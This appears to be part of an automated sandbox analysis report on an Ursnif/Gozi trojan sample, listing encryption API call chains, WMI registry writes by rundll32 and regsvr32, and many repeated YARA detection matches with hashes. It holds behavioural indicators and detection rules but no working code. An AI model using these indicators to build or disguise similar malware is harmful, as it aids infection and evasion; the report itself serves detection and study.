Source: Yara match, File source: 5.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_02AF47E5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 4_2_02E347E5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 5_2_045E47E5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError

                  System Summary

Source: Process Memory Space: loaddll32.exe PID: 4124, type: MEMORYSTR, Matched rule: Windows_Trojan_Gozi_fd494041, Author: unknown
Source: Process Memory Space: loaddll32.exe PID: 4124, type: MEMORYSTR, Matched rule: Windows_Trojan_Gozi_261f5ac5, Author: unknown
Source: Process Memory Space: regsvr32.exe PID: 5216, type: MEMORYSTR, Matched rule: Windows_Trojan_Gozi_fd494041, Author: unknown
Source: Process Memory Space: regsvr32.exe PID: 5216, type: MEMORYSTR, Matched rule: Windows_Trojan_Gozi_261f5ac5, Author: unknown
Source: Process Memory Space: rundll32.exe PID: 5020, type: MEMORYSTR, Matched rule: Windows_Trojan_Gozi_fd494041, Author: unknown
Source: Process Memory Space: rundll32.exe PID: 5020, type: MEMORYSTR, Matched rule: Windows_Trojan_Gozi_261f5ac5, Author: unknown
Source: Process Memory Space: rundll32.exe PID: 780, type: MEMORYSTR, Matched rule: Windows_Trojan_Gozi_fd494041, Author: unknown
Source: Process Memory Space: rundll32.exe PID: 780, type: MEMORYSTR, Matched rule: Windows_Trojan_Gozi_261f5ac5, Author: unknown
Source: C:\Windows\System32\loaddll32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: ursnif_IAT_corrected.exe.dll, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
Source: 00000004.00000003.347389084.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Gozi_fd494041, reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000004.00000003.347389084.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Gozi_261f5ac5, reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: 00000005.00000003.322346163.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: 00000004.00000003.347438026.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: 00000004.00000003.347438026.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: 00000004.00000003.347208366.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: 00000004.00000003.347208366.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: 00000005.00000003.322130590.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: 00000005.00000003.322130590.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: 00000000.00000003.343566603.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: 00000000.00000003.343566603.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: 00000000.00000003.343497649.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: 00000000.00000003.343497649.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: 00000004.00000003.347419865.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: 00000004.00000003.347419865.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: 00000005.00000003.322318617.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: 00000005.00000003.322318617.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: 00000000.00000003.343438473.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: 00000000.00000003.343438473.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: 00000003.00000003.354124347.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: 00000003.00000003.354124347.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: 00000003.00000003.353972705.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: 00000003.00000003.353972705.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: 00000004.00000003.347302093.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: 00000004.00000003.347302093.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: 00000000.00000002.817516370.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: 00000000.00000002.817516370.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: 00000004.00000003.347451141.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: 00000004.00000003.347451141.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: 00000000.00000003.343171916.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: 00000000.00000003.343171916.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: 00000003.00000003.354053342.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: 00000003.00000003.354053342.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: 00000000.00000003.343329790.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: 00000000.00000003.343329790.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: 00000003.00000003.354175000.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: 00000003.00000003.354175000.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: 00000005.00000003.322083374.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: 00000005.00000003.322083374.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: 00000003.00000003.354150298.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: 00000003.00000003.354150298.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: 00000000.00000003.343470122.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: 00000000.00000003.343470122.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: 00000005.00000003.322212571.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
